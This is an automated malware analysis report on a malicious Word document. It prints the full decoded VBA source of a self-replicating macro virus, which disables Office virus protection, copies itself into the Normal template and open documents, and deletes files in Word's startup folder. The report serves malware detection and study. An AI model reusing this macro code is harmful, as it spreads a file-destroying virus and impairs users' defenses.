Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b34811714101d1b…

MALICIOUS

Office (OLE)

Size: 42.5 KB
First seen: 2015-10-13
MD5: ed3ab861cc06f43311a2344322079d80
SHA-1: 7c63744c8419a28fbd3f76d0e7a01d590952fb24
SHA-256: 4b34811714101d1beb11aa8af51dc19f3835f8907f99bb209e1b6d7e86456a01
Risk Score: 188

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1546.001 Event Triggered Execution: Run at Startup

The sample is a malicious OLE document containing VBA macros. The macros are designed to disable Office macro security features and replicate themselves to other documents, as indicated by the 'OLE_VBA_MACRO_VIRUS_REPLICATION' heuristic and the script's attempt to disable virus protection and modify the VBA project. The ClamAV detection 'Doc.Trojan.Touchme-1' further supports its malicious nature. The script's intent is to spread itself and impair defenses.

Heuristics (4)

  • VBA macros detected (medium; 2 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering (critical) OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        Options.VirusProtection = False
  • Document_Open macro (low) OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script:
        Private Sub Document_Open()
  • OLE document has large unaccounted-for region (high) OLE_SLACK_ANOMALY
    OLE file is 43,520 bytes but its declared streams total only 16,490 bytes — 27,030 bytes (62%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3873 bytes
SHA-256: 86aa1a9b309b49872c064d36d7e0834c96aa98777e34c05e4163b88264a0d1f9
Detection
ClamAV: Doc.Trojan.Touchme-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' This code written by Reza Pc 212
' Copyright (C) 1999 ReYoKh Team Labs
' University of Gunadarma
'
' for all virii maker 'n the stupid jerk
'
' Last Up-Date 3 November 1999 [19.00:00]

Private Sub Infected()
    On Error Resume Next
    ID = "'tHe FuCkIng aV if TOuCh mE"
    Dim ADSave, NTSave, ADInfect, NTInfect As Boolean
    Dim Listing, Active, Ultah, Name As String
    Dim AD, NT As Object
    
    Set AD = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
    Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
    If AD.Lines(99, 1) = ID Then ADInfect = True
    If NT.Lines(99, 1) = ID Then NTInfect = True
            
    ActiveDocument.Protect -1
    ActiveDocument.Password = ""
    Options.VirusProtection = False
    Options.SavePropertiesPrompt = False
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    WordBasic.DisableAutoMacros True
    Application.Caption = "Mikrosof Werd"
    
    For Each Obj In ActiveDocument.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=ActiveDocument.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    For Each Obj In NormalTemplate.VBProject.VBComponents
        If Obj.Name <> "EcHa" And Obj.Name <> "ThisDocument" Then
            Application.OrganizerDelete Source:=NormalTemplate.FullName, _
            Name:=Obj.Name, Object:=wdOrganizerObjectProjectItems
        End If
    Next Obj
    
    If NTInfect = False Then
        NTSave = NormalTemplate.Saved
        Listing = AD.Lines(1, AD.CountOfLines)
        NT.DeleteLines 1, NT.CountOfLines
        NT.AddFromString Listing
        If NTSave = True Then NormalTemplate.Save
        Application.OrganizerCopy Source:=ActiveDocument.FullName, _
        Destination:=NormalTemplate, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
    End If
    
    ADSave = ActiveDocument.Saved
    Listing = NT.Lines(1, NT.CountOfLines)
    AD.DeleteLines 1, AD.CountOfLines
    AD.AddFromString Listing
    If ADSave = True Then ActiveDocument.Save
    Application.OrganizerCopy Source:=NormalTemplate.FullName, _
    Destination:=ActiveDocument, Name:="EcHa", Object:=wdOrganizerObjectProjectItems
        
    If Day(Date) = 1 Then Name = ID
    If Day(Date) = 5 And Month(Date) = 3 Then Name = "REZA"
    If Day(Date) = 8 And Month(Date) = 8 Then Name = "YOMBI"
    If Day(Date) = 22 And Month(Date) = 12 Then Name = "NELIS"
    If Name <> "" And Name <> ID Then
        Ultah = "Oh ya... Selamat Ulang Tahun !!!" + Chr(13) + Name + _
                ", I hope you always Happy"
        Active = Assistant.Visible
        Assistant.Visible = True
        With Assistant.NewBalloon
            .Text = "EcHa mengucapkan terima kasih... " + Chr(13) + _
                    "Telah menggunakan macro saya" + Chr(13) + Chr(13) + Ultah
            .Show
        End With
        Assistant.Visible = Active
    End If
    Kill Application.StartupPath + "\*.*"
    Options.VirusProtection = True
    WordBasic.DisableAutoMacros False
End Sub
Private Sub Document_Close()
    Infected
End Sub
Private Sub Document_Open()
    Infected
End Sub
Private Sub Document_Save()
    Infected
End Sub
Private Sub Document_New()
    Infected
End Sub
Private Sub Document_Exit()
    Infected
End Sub
Private Sub Document_Exec()
    Infected
End Sub
'tHe FuCkIng aV if TOuCh mE